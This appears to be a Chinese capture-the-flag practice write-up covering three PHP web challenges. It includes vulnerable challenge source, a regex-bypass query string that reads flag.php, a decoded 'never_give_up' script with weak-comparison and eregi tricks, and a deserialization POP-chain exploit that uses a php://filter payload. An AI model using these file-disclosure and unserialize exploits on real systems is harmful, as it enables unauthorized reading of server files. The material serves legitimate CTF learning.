周练4

------------恢复内容开始------------

No one knows regex better than me

 <?php 
error_reporting(0);
$zero=$_REQUEST['zero'];
$first=$_REQUEST['first'];
$second=$zero.$first;
if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){
    $key=$second;　　　　　　　　　　　　　　　　　　　　//zero和first中包含其中任一
    if(preg_match("/\.\.|flag/",$key)){　　　　　　//zero和first中不包含flag
        die("Noooood hacker!");
    }else{
        $third=$first;　　　　　　　　　　　　　　　　　　　　　　　　//字符>/>|
        if(preg_match("/\\|\056\160\150\x70/i",$third)){　　　　//first包含|.php
            $end=substr($third,5);　　　　　　　　　　　　　　　　//截取五位后的字符
            highlight_file(base64_decode($zero).$end);//maybe flag in flag.php
        }　　　　　　　　　　　　//base64解码
    }
}
else{
    highlight_file(__FILE__);
}

first=abcd|.php&zero=ZmxhZw==

never_give_up

%3Cscript%3Ewindow.location.href%3D'http%3A%2F%2Fwww.bugku.com'%3B%3C%2Fscript%3E%20%0A%3C!--JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF--%3E

";if(!$_GET['id'])//如果id=0或无法通过get获得id变量
{　　　　　　　　　　　　//header() 函数向客户端发送或更改原始的 HTTP 报头
    header('Location: hello.php?id=1');  //跳转到hello.php文件且设置id=1
    exit();　　　　　　　　　　　　　　　　　　
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')){　　　　　　　　　　//$a文件中不能有.
    echo 'no no no no no no no';
    return ;
}
$data = @file_get_contents($a,'r');　　//把整个文件读入一个字符串中
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{　　　　　　　　　　　　　　　　　　　　　　　　//弱类型比较　//b的长度大于5　　//eregi截断漏洞　
    require("f4l2a3g.txt");
}
else
{
    print "never never never give up !!!";
}
?>

stripos() 函数查找字符串在另一字符串中第一次出现的位置（不区分大小写)如果没有找到字符串则返回 FALSE

strripos() - 查找字符串在另一字符串中最后一次出现的位置（不区分大小写）

strpos() - 查找字符串在另一字符串中第一次出现的位置（区分大小写）

strrpos() - 查找字符串在另一字符串中最后一次出现的位置（区分大小写）

Pop2022

<?php
if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/
class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;         //3. _get
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page))   //4. __toString()


            echo "You can Not Enter 2022";     
            $this->page = "index.php";   
        }
    }
}


class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);        //1. 目标
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();         //2.  __invoke()
    }
}
/**********************Try to See flag.php*****************************/

<?php
class Try_Work_Hard{
    protected  $var = 'php://filter/read=convert.base64-encode/resource=flag.php';
}

class Road_is_Long{
    public $page;
    public $string;
}

class Make_a_Change{
    public $effort;
}
$a = new Road_is_Long();
$b = new Road_is_Long();
$c = new Make_a_Change();
$d = new Try_Work_Hard();
$a -> page = $b;
$b -> string = $c;
$c -> effort = $d;
echo urlencode(serialize($a));